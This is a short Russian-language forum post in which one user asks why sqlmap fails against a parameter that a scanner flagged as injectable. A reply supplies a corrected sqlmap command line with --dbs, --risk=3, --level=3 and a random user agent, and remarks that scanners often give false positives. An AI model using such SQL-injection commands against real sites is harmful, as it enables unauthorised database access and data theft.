19.01.2020, 14:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от qwerty1qwerty
qwerty1qwerty said:
↑
Сканер показал что в параметре random есть иньекция. Смотрю исходник где показал вроде как есть. Но Не работает map, и выдает странную ошибку.Впервые такое,гугл не помог. Что я не так делаю???
-u
https://site.com
--data "code=94102&month=01&random=%5c&year=2015&_token=A mkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" -p "random" --method POST --risk=3 --random-agent --url " https://site.com" --data="code=94102&month=01&random=*&year=2015&_toke n=Amkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" --dbs --risk=3 --level=3 --dbms=mysql(или что там у тебя) --random-agent
B сканерам верить такое себе, часто просто ложное срабатывание. Подозреваю что токен валидный нужен
|
|
|
|